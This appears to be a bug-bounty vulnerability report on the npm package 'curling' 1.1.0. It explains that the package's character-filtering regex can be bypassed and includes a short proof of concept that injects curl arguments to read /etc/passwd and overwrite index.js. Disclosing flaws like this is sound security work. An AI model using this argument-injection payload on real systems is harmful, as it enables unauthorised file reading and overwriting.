[curling] Remote Code Execution

I would like to report `RCE` in `curling` I can bypass the security check for special characters, read / overwrite file # Module **module name:** curling **version:** 1.1.0 **npm page:** `https://www.npmjs.com/package/curling` ## Module Description A node wrapper for curl with a very simple api. ## Module Stats [156] weekly downloads # Vulnerability ## Vulnerability Description The regular expression does not perform proper validation and, when combined with curl, leads to disastrous consequences: ```javascript /[`$&{}[;|]/g.test(command) ``` ## Steps To Reproduce: - Run `npm i curling` - Create and run the following POC index.js: ```javascript const curling = require('curling'); curling.run('file:///etc/passwd -o ./index.js', function(d, payload){console.log(payload)}); ``` - The exploit worked and overwritten the file - `index.js` {F973903} ## Patch Regular expression needs improvement # Wrap up - I contacted the maintainer to let them know: [N] - I opened an issue in the related repository: [N] ## Impact Command Injection on `curling` module via insecure command